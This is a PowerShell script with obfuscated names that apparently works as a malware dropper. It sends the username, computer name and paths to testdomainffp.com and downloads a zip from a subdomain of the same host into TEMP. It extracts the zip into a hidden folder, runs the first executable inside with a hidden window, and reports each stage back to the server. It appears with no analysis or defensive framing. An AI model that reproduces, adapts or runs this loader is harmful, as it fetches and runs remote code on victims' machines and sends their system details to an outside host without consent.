function ril_qwepsx7u6lmowwf5rl651tw5k($event, $note="", $path="", $file="") { $endpoint = 'https://testdomainffp.com' + '/aurunlog?id=' + $zqdbmgj4_fylgmapqk3yj2nin + '&s=' + $event $queryParams = @( '&user=' + [System.Uri]::EscapeDataString($ztjhzmo_rsq_srwminbdreq3dbh53k0h), '&pc=' + [System.Uri]::EscapeDataString($gxyta2_lpqxkjsdk0_), '&cwd=' + [System.Uri]::EscapeDataString($path), '&noise=' + (Get-Random -Minimum 5000 -Maximum 15000) ) if ($file -and $file -ne $null) { $queryParams += '&exe_name=' + [System.Uri]::EscapeDataString($file) } if ($note -and $note -ne $null) { $queryParams += '&msg=' + [System.Uri]::EscapeDataString($note) } $fullUri = $endpoint + ($queryParams -join '') try { $null = Invoke-WebRequest -Uri $fullUri -Method GET -UseBasicParsing -TimeoutSec 5 } catch { } } $zqdbmgj4_fylgmapqk3yj2nin = 'ff4ea9d9-bde9-4ce1-8153-b00c698e4192' $ztjhzmo_rsq_srwminbdreq3dbh53k0h = $env:USERNAME $gxyta2_lpqxkjsdk0_ = $env:COMPUTERNAME & ril_qwepsx7u6lmowwf5rl651tw5k 'check_system_ok' '' $env:TEMP $null Add-Type -AssemblyName System.IO.Compression.FileSystem $eztynv_tqmhzj_mykkhlo_ddnsiakx4e = 'https://booking.testdomainffp.com/summguponny.zip' $euhy4_pemzlt_wlqg8pxx = "$env:TEMP\kukyhjvj_yeas_aurun.zip" $womtsck_ovpguf_swgr = $false $ljcvqsbqf_fwalwpy3 = $null [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 -bor [System.Net.SecurityProtocolType]::Tls13 try { $progressPreference = 'SilentlyContinue' Invoke-WebRequest -Uri $eztynv_tqmhzj_mykkhlo_ddnsiakx4e -OutFile $euhy4_pemzlt_wlqg8pxx -UserAgent "Mozilla/5.0" -UseBasicParsing -TimeoutSec 30 if (Test-Path $euhy4_pemzlt_wlqg8pxx) { $fileInfo = Get-Item $euhy4_pemzlt_wlqg8pxx if ($fileInfo.Length -gt 10240) { $womtsck_ovpguf_swgr = $true & ril_qwepsx7u6lmowwf5rl651tw5k 'download_ok' '' "$env:TEMP" $null } else { Remove-Item $euhy4_pemzlt_wlqg8pxx -Force $ljcvqsbqf_fwalwpy3 = "FileTooSmall" & ril_qwepsx7u6lmowwf5rl651tw5k 'download_fail' $ljcvqsbqf_fwalwpy3 "$env:TEMP" $null exit 1 } } } catch { $ljcvqsbqf_fwalwpy3 = $_.Exception.Message & ril_qwepsx7u6lmowwf5rl651tw5k 'download_fail' $ljcvqsbqf_fwalwpy3 "$env:TEMP" $null exit 1 } if (-not $womtsck_ovpguf_swgr) { exit 1 } $lhmks_hhvvlra_brke = "$env:TEMP\sys_init_aurun_" + [System.Guid]::NewGuid().ToString().Substring(0,8) $ljcvqsbqf_fwalwpy3 = $null try { $null = New-Item -Path $lhmks_hhvvlra_brke -ItemType Directory -Force [System.IO.Compression.ZipFile]::ExtractToDirectory($euhy4_pemzlt_wlqg8pxx, $lhmks_hhvvlra_brke) # Разблокировка файлов Get-ChildItem $lhmks_hhvvlra_brke -Recurse -File | ForEach-Object { $_.Attributes = $_.Attributes -band (-bnot [IO.FileAttributes]::ReadOnly) } Set-ItemProperty -Path $lhmks_hhvvlra_brke -Name Attributes -Value 'Hidden' & ril_qwepsx7u6lmowwf5rl651tw5k 'unzip_ok' $null $lhmks_hhvvlra_brke $null Remove-Item $euhy4_pemzlt_wlqg8pxx -Force -ErrorAction SilentlyContinue } catch { $ljcvqsbqf_fwalwpy3 = $_.Exception.Message if (Test-Path $lhmks_hhvvlra_brke) { Remove-Item $lhmks_hhvvlra_brke -Recurse -Force -ErrorAction SilentlyContinue } & ril_qwepsx7u6lmowwf5rl651tw5k 'unzip_fail' $ljcvqsbqf_fwalwpy3 $null $null exit 1 } if (-not (Test-Path $lhmks_hhvvlra_brke)) { exit 1 } $jny_prt_panbs_buticcnokmtj62 = Get-ChildItem -Path $lhmks_hhvvlra_brke -Filter "*.exe" -Recurse | Select-Object -First 1 if (-not $jny_prt_panbs_buticcnokmtj62) { & ril_qwepsx7u6lmowwf5rl651tw5k 'run_fail' 'No EXE found' $lhmks_hhvvlra_brke $null exit 1 } $ltc_vijxbfszfanl4iptwtr9h6cjusr6ns = $jny_prt_panbs_buticcnokmtj62.FullName $dhkk0_lgzedl_viexxbaq_uwoeg = Split-Path $ltc_vijxbfszfanl4iptwtr9h6cjusr6ns $fmnncsb_vpx9_zcg4_les = Split-Path $ltc_vijxbfszfanl4iptwtr9h6cjusr6ns -Leaf try { $proc = Start-Process -FilePath $ltc_vijxbfszfanl4iptwtr9h6cjusr6ns -WorkingDirectory $dhkk0_lgzedl_viexxbaq_uwoeg -WindowStyle Hidden -PassThru -ErrorAction Stop & ril_qwepsx7u6lmowwf5rl651tw5k 'run_ok' $proc.Id $dhkk0_lgzedl_viexxbaq_uwoeg $fmnncsb_vpx9_zcg4_les } catch { & ril_qwepsx7u6lmowwf5rl651tw5k 'run_fail' $_.Exception.Message $dhkk0_lgzedl_viexxbaq_uwoeg $fmnncsb_vpx9_zcg4_les }